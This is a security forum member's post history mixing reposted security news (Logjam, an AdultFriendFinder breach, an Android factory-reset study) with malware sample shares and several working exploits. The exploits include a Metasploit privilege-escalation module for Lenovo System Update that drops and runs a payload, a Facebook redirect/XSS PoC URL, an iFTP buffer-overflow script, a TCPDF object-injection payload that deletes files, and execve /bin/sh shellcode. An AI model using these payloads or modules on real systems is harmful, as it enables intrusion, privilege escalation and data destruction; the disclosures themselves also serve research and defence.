Jump to content

Aerosol

Active Members
  • Posts

    3453
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by Aerosol

  1. Hi, hadn't any time to take a closer look at it. Maybe someone is interested in this malware. Description can be found here: Win32/TrojanDownloader.Spyrov.A | ESET Virusradar Attached: Win32/TrojanDownloader.Spyrov.A samples Download Pass: infected Source
  2. The virus on VT: https://www.virustotal.com/en/file/8f35f6f780acccfb406b918db6ef01111dd2c5200a16e97f25d35f76e2532e6d/analysis/1432362743/ The virus inject many process like it: but I cann't found how it autostart. When OS restarted, it start itself via explorer.exe, but I do not know how it auto started. log: 2015/05/23 15:54:55 c:\windows\explorer.exe Create new process c:\users\test\appdata\roaming\mozilla\firefox\profiles\4ude5xz7.default\storage\permanent\xulstore.exe?Cmd line: "C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\4ude5xz7.default\storage\permanent\xulstore.exe" Download Pass: infected Source
  3. Researchers have revealed that Android's 'factory reset' feature doesn't remove all data from devices, leaving up to 500 million users open to attack. The University of Cambridge has revealed that, even with full-disk encryption in play, performing a factory reset on Android smartphones leaves sensitive information up for grabs on the majority of devices. The university examined 21 phones, running Android versions 2.3 to 4.3, and found could up to 500 million Android devices might be at risk of leaving personal data available to attackers after being 'reset.' For example, the researchers found that they were easily able to access the previous owners Gmail account on 80 percent of the devices it tested. "We were able to retrieve the Google master cookie from the great majority of phones, which means that we could have logged on to the previous owner’s gmail account," the researchers said. All of the 21 phones left some sensitive data behind, including information generated by Facebook and WhatsApp, images, videos and text messages. They researchers noted Google's own-brand Nexus firms fared better than those from the likes of HTC and Samsung, but said that all vendors need to do more to protect user data. "The reasons for failure are complex; new phones are generally better than old ones, and Google’s own brand phones are better than the OEM offerings. However the vendors need to do a fair bit of work, and users need to take a fair amount of care." This research follows an investigation carried out back in 2014 which revealed that CEX and Cash Converters have been selling second-hand mobile phones containing sensitive information from their previous owners, despite promising these customers that the phones would be fully wiped before being sold on. In a seperate report, the Cambridge researchers note that such companies could carry out large-scale attacks given the sensitive data they are able to access, made easier by third-party remote wiping service that also fail to clear information from devices. "Antivirus software that relies on a faulty factory reset can only go so far, and there’s only so much you can do with a user process," the researchers said. "These failings mean that staff at firms which handle lots of second-hand phones (whether lost, stolen, sold or given to charity) could launch some truly industrial-scale attacks." These findings could spell bad news for businesses, with Good Technology revealing earlier this month that Android accounted for 26 percent of enterprise smartphone activiations in the first quarter of 2015. Source
  4. Hackers have pilfered and published the personal details and sexual preferences of 3.9 million users of hookup website Adult FriendFinder. Lusty lonely hearts, including those who asked for their account to be deleted, have been left in an awkward position after hackers broke into systems before uploading the details to the dark web. Email addresses, usernames, postcodes, dates of birth and IP addresses of 3.9 million members have been exposed. The UK's Channel 4 News, which came across the leak during a wider investigation into the dark web, broke the story of the FriendFinder breach on Thursday. Independent infosec bod Bev Robb penned a blog post about the leak in mid-April but did not name the hacked site. FriendFinder Networks admitted the breach had occurred and told Channel 4 that it had launched a "comprehensive investigation with the help of a leading third-party forensics expert". However, a warning to members is not as yet listed on the (NSFW) site itself, noted independent security expert Graham Cluley. Adult FriendFinder boasts 63 million users worldwide. Rob Norris, Fujitsu director of enterprise and cyber-security in UK and Ireland, noted that the breach was the latest in a long line of similar spills. "Another day, another data breach – this time FriendFinder is in the spotlight," Norris said. "Although this hack is looking to be resolved quickly, it once again highlights that it is no longer about prevention, but instead about accepting a data breach will occur and moving to a proactive approach which allows better preparation for dealing with today’s threats." He added: "The amount of data and confidential information transacted every day, coupled with the growth in reliance on digital services, means that any organisation is at risk – making most an easy target in the eyes of a cyber-criminal." Brian Honan, an infosec consultant who founded and heads up Ireland's Computer Security Incident Response Team, said that the latest leak posed a higher risk of harm than most. "I've always thought adult dating sites would be a perfect target for criminals to breach and use details for extortion," he said in a Twitter update. Source
  5. Hackers have managed to make a huge video billboard in Atlanta display an obscene image favoured by internet pranksters. It prompted calls to police, and soon after, the billboard's owner cut off its power supply. The hack came after a security researcher warned the company, which runs thousands of the video billboards, that they were vulnerable to attack. The FBI and Homeland Security are now investigating the hack. The attackers are believed to have been able to take over the billboard because it used an easy-to-guess password on its net-connected remote administration system. The billboard is owned by US electric-sign giant Yesco, which runs thousands of similar billboards across America. Other signs in other states are also believed to have had their images changed at the same time. Security expert Dan Tentler said in a tweet that he had warned Yesco about the potential for attack, but the company had told him that it was "not interested" in his information. Mr Tentler said it was easy to find hundreds of other signs on the internet that were vulnerable in the same way. Many of these signs were still online after the hack attack had taken place, he added. A group calling itself the Assange Shuffle Collective claimed responsibility for the attack, in a discussion on social news site Reddit. However, there has been no independent verification of the claim. Source
  6. The recently discovered Logjam encryption flaw proves that governments need to aid, not hinder, businesses' efforts to encrypt data, according to experts in the white hat community. Logjam is an encryption flaw that was uncovered on Wednesday by researchers at Inria Nancy-Grand Est, Inria Paris-Rocquencourt, Microsoft Research and the Johns Hopkins, Michigan and Pennsylvania universities. Its discovery sent ripples through the security community as in theory it leaves tens of thousands of web and mail servers open to man-in-the-middle attacks. CipherCloud chief trust officer Bob West said that Logjam should act as a cautionary tale to legislators considering weakening companies' ability to encrypt data. "Logjam is a cautionary tale for our lawmakers and leaders who are under pressure by government groups to weaken encryption," he said. "Diluting the strength of encryption for one group creates a vulnerability that can be exploited by any group. Human rights, privacy and the resilience of our economy will be the casualties if back doors are created in encryption solutions." Venafi vice president of security strategy Kevin Bocek agreed, arguing that Logjam proves that weakening encryption will aid cyber criminals. "With more sites using SSL/TLS keys and certificates, the target is getting bigger for the bad guys," he said. "The [bad guys'] interest in intercepting encrypted traffic, spoofing trusted sites, or hiding in encryption is only growing, and many out there predict that a crypto-apocalypse is on the horizon." Logjam's discovery follows widespread concerns about the UK government's intentions concerning encryption. The government indicated plans to force firms to make encrypted data accessible to law enforcement in its election manifesto. At a technical level, Logjam is a flaw in the Diffie-Hellman key exchange cryptographic algorithm used while creating encrypted HTTPS, SSH, IPsec, SMTPS and TLS connections. "We have uncovered several weaknesses in how Diffie-Hellman key exchange has been deployed," read the researchers' threat advisory. "The Logjam attack allows a man-in-the-middle attacker to downgrade vulnerable TLS connections to 512-bit export-grade cryptography. This allows the attacker to read and modify any data passed over the connection." The researchers added that the vulnerability is similar to the Freak and Poodle flaws and "affects any server that supports DHE_EXPORT ciphers and all modern web browsers". The advisory said that Logjam renders 8.4 percent of the top one million web domains open to exploitation, but warned that the flaw's reach is significantly higher. Freak is a cross-platform flaw in SSL/TLS protocols that could be exploited to intercept and decrypt HTTPS connections between vulnerable clients and servers. It was uncovered in March. Poodle is a flaw in SSL version 3.0 which could leave users' web data open to attack. It was uncovered by researchers at Google in October 2014. The researchers said that the flaw could be used to intercept data passing between VPN servers, and is consistent with the NSA-led attacks described in leaked PRISM documents. "We carried out this computation against the most common 512-bit prime used for TLS and demonstrated that the Logjam attack can be used to downgrade connections to 80 percent of TLS servers supporting DHE_EXPORT," read the paper. "We further estimate that an academic team can break a 768-bit prime, and that a nation-state can break a 1,024-bit prime. Breaking the most common 1,024-bit prime used by web servers would allow passive eavesdropping on connections to 18 percent of the top one million HTTPS domains. "A close reading of published NSA leaks shows that the agency's attacks on VPNs are consistent with having achieved such a break," the researchers said. News that the NSA's specialist Office of Target Pursuit maintains a team of engineers dedicated to cracking the encrypted traffic of VPNs broke in December 2014. However, despite the seriousness of the Logjam flaw, experts have pointed out Logjam is more significant as a cautionary tale than game changing vulnerability. Rapid7 engineering manager Tod Beardsley explained that the high degree of sophistication required to mount a Logjam attack makes it unlikely that it will be widely targeted. "The only two groups really in a position to take advantage of this vulnerability are criminals on coffee shop WiFi networks, and state actors who already control a huge chunk of the local internet," he said. LogRhythm vice president Ross Brewer agreed, pointing out that patches for the flaw are already being rolled out. "The fact that Logjam can only be exploited when hackers and targets are on the same network, as well as patches being imminent, means that hype around it is likely to be a bit of a storm in a teacup," he said. "Organisations should, however, use flaws like this as an excuse to give themselves a security health check." The white hat community is one of many calling for an end to governments rethink their surveillance strategies. Over 140 big name companies sent a letter to US president Barack Obama on Tuesday urging him to cease the government's war on encryption. Source
  7. Document Title: =============== Facebook #26 - Filter Bypass & Exception Handling Redirect Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1483 http://www.vulnerability-lab.com/get_content.php?id=1484 Video View: https://www.youtube.com/watch?v=I65zFWF-pMg Release Date: ============= 2015-05-09 Vulnerability Laboratory ID (VL-ID): ==================================== 1483 Common Vulnerability Scoring System: ==================================== 5.1 Product & Service Introduction: =============================== Facebook is an online social networking service, whose name stems from the colloquial name for the book given to students at the start of the academic year by some university administrations in the United States to help students get to know each other. It was founded in February 2004 by Mark Zuckerberg with his college roommates and fellow Harvard University students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. The website`s membership was initially limited by the founders to Harvard students, but was expanded to other colleges in the Boston area, the Ivy League, and Stanford University. It gradually added support for students at various other universities before opening to high school students, and eventually to anyone aged 13 and over. Facebook now allows any users who declare themselves to be at least 13 years old to become registered users of the site. Users must register before using the site, after which they may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics, and categorize their friends into lists such as `People From Work` or `Close Friends`. As of September 2012, Facebook has over one billion active users, of which 8.7% are fake. According to a May 2011 Consumer Reports survey, there are 7.5 million children under 13 with accounts and 5 million under 10, violating the site`s terms of service. In May 2005, Accel partners invested $12.7 million in Facebook, and Jim Breyer added $1 million of his own money to the pot. A January 2009 Compete.com study ranked Facebook as the most used social networking service by worldwide monthly active users. Entertainment Weekly included the site on its end-of-the-decade `best-of` list, saying, `How on earth did we stalk our exes, remember our co-workers` birthdays, bug our friends, and play a rousing game of Scrabulous before Facebook?` Facebook eventually filed for an initial public offering on February 1, 2012, and was headquartered in Menlo Park, California. Facebook Inc. began selling stock to the public and trading on the NASDAQ on May 18, 2012. Based on its 2012 income of USD 5.1 Billion, Facebook joined the Fortune 500 list for the first time, being placed at position of 462 on the list published in 2013. (Copy of the Homepage: http://en.wikipedia.org/wiki/Facebook ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a filter bypass and open redirect web vulnerability in the official Facebook online-service framework. Vulnerability Disclosure Timeline: ================================== 2015-05-01: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2015-05-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Facebook Product: Framework - Content Management System 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A filter validation issue is existant in the exception-handling that normally redirects to the original facebook source. Ever if an error comes up the website will show the context in the secure exception and redirects on okey click to the original valid source. In case of terminating the string (%00%00_%3F) with extended <_ it is possible to bypass the exception-handling filter exception to redirect invalid source to an external target. The video demonstrates how to bypass the filter validation by confusing the context copying with the non encoded url that invalid. By generating a payload that is ahead in the display value and atleast in the url ref the target exception redirect can be manipulated. Proof of Concept (PoC): ======================= https://www.facebook.com/dialog/send?app_id=102628213125203&display=F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_popup&link=http%3A%2F%2Fwww.ebay.com%2Fcln%2F%00%2F%00%00%3C_&{alert%28%27XSS%27%29}%3B%3E%3%00%3C_&{alert%28%27XSS%27%29}%3B%3E%3Froken%3DcUgayN&description=%00%40eBayF%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_&redirect_uri=http%3A%2F%2F%EF%BF%BD/%EF%BF%BD%EF%BF%BD%3C%uFFFD/%uFFFD%uFFFD%3C_popup%2Fsoc%2Fshareclose&__mref=F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_message_bubble https://www.facebook.com/dialog/send?app_id=102628213125203&display=F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_popup&link=http%3A%2F%2Fwww.ebay.com%2Fcln%2F%00%2F%00%00%3C_&{alert%28%27XSS%27%29}%3B%3E%3%00%3C_&{alert%28%27XSS%27%29}%3B%3E%3Froken%3DcUgayN&description=%00%40eBayF%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_&redirect_uri=http%3A%2F%2F%EF%BF%BD/%EF%BF%BD%EF%BF%BD%3C%uFFFD/%uFFFD%uFFFD%3C_popup%2Fsoc%2Fshareclose&__mref=F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_message_bubble Payload: 3A%2F%2F%EF%BF%BD/%EF%BF%BD%EF%BF%BD%3C%uFFFD/%uFFFD%uFFFD%3C_ F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_message_bubble F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_message_bubble<_ PoC Video(s): The video demonstrates how to evade the filter validation of the message context that is delivered by a url link. The researcher demonstrates how to bypass the basic encoding by preparing a valid exception with unauthorized redirect. Security Risk: ============== The security risk of the filter bypass and exception redirect web vulnerability is estimated as medium. (CVSS 5.1) The same payload to evade the filter validation can be used to other sections and exceptions that redirect the ref with the same conditions. Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  8. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class Metasploit3 < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::FileDropper include Msf::Post::Windows::Priv include Msf::Post::Windows::Services Rank = ExcellentRanking def initialize(info={}) super(update_info(info, { 'Name' => 'Lenovo System Update Privilege Escalation', 'Description' => %q{ The named pipe, \SUPipeServer, can be accessed by normal users to interact with the System update service. The service provides the possibility to execute arbitrary commands as SYSTEM if a valid security token is provided. This token can be generated by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the System Update is stopped by default but can be started/stopped calling the Executable ConfigService.exe. }, 'License' => MSF_LICENSE, 'Author' => [ 'Micahel Milvich', # vulnerability discovery, advisory 'Sofiane Talmat', # vulnerability discovery, advisory 'h0ng10' # Metasploit module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => ['meterpreter'], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows', { } ] ], 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'References' => [ ['OSVDB', '121522'], ['CVE', '2015-2219'], ['URL', 'http://www.ioactive.com/pdfs/Lenovo_System_Update_Multiple_Privilege_Escalations.pdf'] ], 'DisclosureDate' => 'Apr 12 2015', 'DefaultTarget' => 0 })) register_options([ OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)']), OptInt.new('Sleep', [true, 'Time to sleep while service starts (seconds)', 4]), ], self.class) end def check os = sysinfo['OS'] unless os =~ /windows/i return Exploit::CheckCode::Safe end svc = service_info('SUService') if svc && svc[:display] =~ /System Update/ vprint_good("Found service '#{svc[:display]}'") return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end end def write_named_pipe(pipe, command) invalid_handle_value = 0xFFFFFFFF r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0x3, nil, 'OPEN_EXISTING', 'FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL', 0) handle = r['return'] if handle == invalid_handle_value fail_with(Failure::NoTarget, "#{pipe} named pipe not found") else vprint_good("Opended #{pipe}! Proceeding...") end begin # First, write the string length as Int32 value w = client.railgun.kernel32.WriteFile(handle, [command.length].pack('l'), 4, 4, nil) if w['return'] == false print_error('The was an error writing to pipe, check permissions') return false end # Then we send the real command w = client.railgun.kernel32.WriteFile(handle, command, command.length, 4, nil) if w['return'] == false print_error('The was an error writing to pipe, check permissions') return false end ensure session.railgun.kernel32.CloseHandle(handle) end true end def get_security_token(lenovo_directory) unless client.railgun.get_dll('tvsutil') client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll") client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], windows_name = nil, calling_conv = 'cdecl') end dll_response = client.railgun.tvsutil.GetSystemInfoData(256) dll_response['systeminfo'][0,40] end def config_service(lenovo_directory, option) cmd_exec("#{lenovo_directory}\\ConfigService.exe #{option}") end def exploit if is_system? fail_with(Failure::NoTarget, 'Session is already elevated') end su_directory = service_info('SUService')[:path][1..-16] print_status('Starting service via ConfigService.exe') config_service(su_directory, 'start') print_status('Giving the service some time to start...') Rex.sleep(datastore['Sleep']) print_status("Getting security token...") token = get_security_token(su_directory) vprint_good("Security token is: #{token}") if datastore['WritableDir'].nil? || datastore['WritableDir'].empty? temp_dir = get_env('TEMP') else temp_dir = datastore['WritableDir'] end print_status("Using #{temp_dir} to drop the payload") begin cd(temp_dir) rescue Rex::Post::Meterpreter::RequestError fail_with(Failure::BadConfig, "Failed to use the #{temp_dir} directory") end print_status('Writing malicious exe to remote filesystem') write_path = pwd exe_name = "#{rand_text_alpha(10 + rand(10))}.exe" begin write_file(exe_name, generate_payload_exe) register_file_for_cleanup("#{write_path}\\#{exe_name}") rescue Rex::Post::Meterpreter::RequestError fail_with(Failure::Unknown, "Failed to drop payload into #{temp_dir}") end print_status('Sending Execute command to update service') begin write_res = write_named_pipe("\\\\.\\pipe\\SUPipeServer", "/execute #{exe_name} /arguments /directory #{write_path} /type COMMAND /securitycode #{token}") rescue Rex::Post::Meterpreter::RequestError fail_with(Failure::Unknown, 'Failed to write to pipe') end unless write_res fail_with(Failure::Unknown, 'Failed to write to pipe') end print_status('Stopping service via ConfigService.exe') config_service(su_directory, 'stop') end end Source
  9. #!/usr/bin/python ########################################################################################### #Exploit Title:iFTP 2.21 Buffer OverFlow Crash PoC #Author: dogo h@ck #Date Discovered : 12-5-2015 #Vendor Homepage: http://www.memecode.com/iftp.php #Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe #Version: 2.21 #Tested on : Windows XP Sp3 ########################################################################################### #Crash : Go to Connect > Host Address > Post it #Bad Characters (\x00\x09\x0a\x0d\x80 and all from \x80 To \xFF I know It's FU&^% ) ############################################################################################ buffer = "A"*1865 buffer +="BBBB" #Pointer to next SEH record buffer +="CCCC" #SE handler buffer +="D"*500 file = "buffer.txt" f = open(file, "w") f.write(buffer) f.close() Source
  10. Document Title: =============== iClassSchedule 1.6 iOS & Android - Persistent UI Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1494 Release Date: ============= 2015-05-13 Vulnerability Laboratory ID (VL-ID): ==================================== 1494 Common Vulnerability Scoring System: ==================================== 3.4 Product & Service Introduction: =============================== Couldn`t you remember your lesson time? If you are a high-school student or a university one, you will be able easily to consult your weekly guide, using this App on your iPhone. You could choose your sujects following your plan and give them a colour for marking them at the end of the week. (Copy of the Homepage: https://play.google.com/store/apps/details?id=com.idalmedia.android.timetable&hl=it & https://itunes.apple.com/en/app/orariolezioni/id542313616) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official iClassSchedule v1.6 iOS & Android mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-13: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Tel.Net srl Product: iClassSchedule - iOS & Android Mobile Web Application 1.6 iOS and 4.6 Android Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ An application-side validation vulnerability has been discovered in the official iClassSchedule v1.6 iOS & Android mobile web-application. The vulnerability allows an attacker to inject own script code as payload to the application-side of the vulnerable service function or module. The vulnerability is located in the `Aula (name input)` values of the vulnerable `iClass Calender` module. Local attackers are able to manipulate the `Aula name` input to compromise the `Calender Index` module. The execution point of the script code occurs on the application-side in the listing module by the manipulated name context field. The Apple iOS and Google Android mobile application versions are affected by the vulnerability. The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.4. Exploitation of the application-side web vulnerability requires a privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious sources and application-side manipulation of affected or connected module context. Vulnerable Module(s): [+] Aula Vulnerable Parameter(s): [+] name Affected Module(s): [+] iClass Calender Events Context (App Index) Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by local attackers with physical device access and with low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. 1. Install the mobile application to your iOS or Android device 2. Open the application and add a new entry to the iclass calender index 3. Inject to the Aula name value your own script code (payload) for testings 4. Save the entry and move back to the iclass calender index of the app 5. The code executes because of the wrong encoding in the calender itself. Note: Export and Exchange of malicious context is possible! 6. Successful reproduce of the security vulnerability! Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable name value in the iclass calender module. Restrict the name input and disallow usage of special chars to prevent persistent cross site scripting attacks. Security Risk: ============== The security risk of the persistent input validation web vulnerability in the name value is estimated as medium. (CVSS 3.4) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Katharin S. L. (CH) (research@vulnerability-lab.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  11. # Affected software: SolarWinds Network Performance Monitor # Type of vulnerability:url redirection # URL:http://www.solarwinds.com/ # Discovered by: provensec # Website: provensec.com #version:N/A # Proof of concept http://oriondemo.solarwinds.com/Orion/Login.aspx?ReturnUrl=//google.com Source
  12. TCPDF library Universal POI Payload to Arbitrary File Deletion [+] Author: Filippo Roncari [+] Target: TCPDF library [+] Version: <= 5.9 and probably others [tested on v5.9] [+] Vendor: http://www.tcpdf.org [+] Accessibility: Remote [+] Severity: High [+] CVE: n/a [+] Advisory URL: n/a [+] Contacts: f.roncari@securenetwork.it / f@unsec.it [+] Summary TCPDF library is one of the world's most used open source PHP libraries, included in thousands of CMS and Web applications worldwide. More information at: http://en.wikipedia.org/wiki/TCPDF. A universal Object Injection payload for vulnerable PHP applications, which make use of TCPDF library, is here shared. [+] Exploit Details The identified payload allows to exploit any POI vulnerable web application that uses unserialize() on not sanitized user input in a point from which the Tcpdf class is loadable. The payload abuses the __destruct() magic method of the Tcpdf class defined in tcpdf.php and allows to arbitrary delete files on the filesystem. [+] Technical Details Tcpdf.php contains the Tcpdf class definition. The __destruct() method, at least up to version 5.9 (and possibly others), is implemented as follows. [!] Method __destruct() in tcpdf.php ------------------------- public function __destruct() { // restore internal encoding if (isset($this->internal_encoding) AND !empty($this->internal_encoding)) { mb_internal_encoding($this->internal_encoding); } // unset all class variables $this->_destroy(true); } ------------------------- As you can see, the main action performed by __destruct() is the invocation of the inner _destroy() method, which, along with other things, calls the unlink() function on the internal object buffer. [!] Method _destroy() in tcpdf.php ------------------------- public function _destroy($destroyall=false, $preserve_objcopy=false) { if ($destroyall AND isset($this->diskcache) AND $this->diskcache AND (!$preserve_objcopy) AND (!$this->empty_string($this->buffer))) { unlink($this->buffer); } [...] } ------------------------- For a better understanding of the payload, you should know that $buffer is defined as a protected property of the Tcpdf object, which means significant differences in serialization compared to normal properties. [!] $buffer in tcpdf.php ------------------------- /** * @var buffer holding in-memory PDF * @access protected */ protected $buffer; ------------------------- [+] Proof of Concept (PoC) In view of the above, the payload consists of a serialized Tcpdf object with two protected properties set: buffer and diskcache. The first will contain the path to the arbitrary file to delete, while diskcache is a boolean property set to true, necessary to enter the _destroy() inner if branch, in order to reach the unlink() call. A particular attention must be addressed to the null-bytes surrounding the asterisks before the property names. This is the way (crazy, I know) in which PHP serializes protected object properties. An incorrect conversion of the null-bytes during payload injection will result in the exploit failure. [!] Payload ------------------------- O:5:"TCPDF":2:{s:9:"%00*%00buffer";s:[PATH_LENGTH]:"[FILE_PATH_TO_DELETE]";s:12:"%00*%00diskcache";b:1;} ------------------------- [!] Generic PoC Exploit ------------------------- http://vulnerablesite.com/vulnerable_page.php?vulnearble_par=O:5:"TCPDF":2:{s:9:"%00*%00buffer";s:26:"/var/www/arbitraryfile.ext";s:12:"%00*%00diskcache";b:1;} ------------------------- [+] Disclaimer Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. Source
  13. Salut si bine ai venit!
  14. Salut si bine ai venit! ( sedere placuta )
  15. Din pacate DA sunt foarte multe cazuri de mita la proba practica.( am cunostiinte care au dat banii sa fie siguri ca iau ) legat de pret, depinde: in jur de 500/600 euro. Eu nu vorbesc de Jud Mures ci in mai toate partile.
  16. /* ; Title: Linux/x86 execve "/bin/sh" - shellcode 26 bytes ; Platform: linux/x86_64 ; Date: 2015-05-19 ; Author: Reza Behzadpour ; Simple ShellCode section .text global _start _start: xor ecx,ecx mul ecx ;execve("/bin/sh", NULL, NULL) mov al,11 jmp shell shell_ret: pop ebx push ecx push ebx pop ebx int 0x80 shell: call shell_ret db "/bin/sh" */ /* # tcc -o ./shellcode ./shellcode.c # uname -r 3.12-kali1-686-pae */ #include <stdio.h> #include <string.h> char shellcode[] = { "\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b" "\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68" }; int main() { printf("Shellcode Length: %d\n", (int)strlen(shellcode)); int *ret; ret = (int *) &ret + 2; (*ret) = (int) shellcode; return 0; } Source
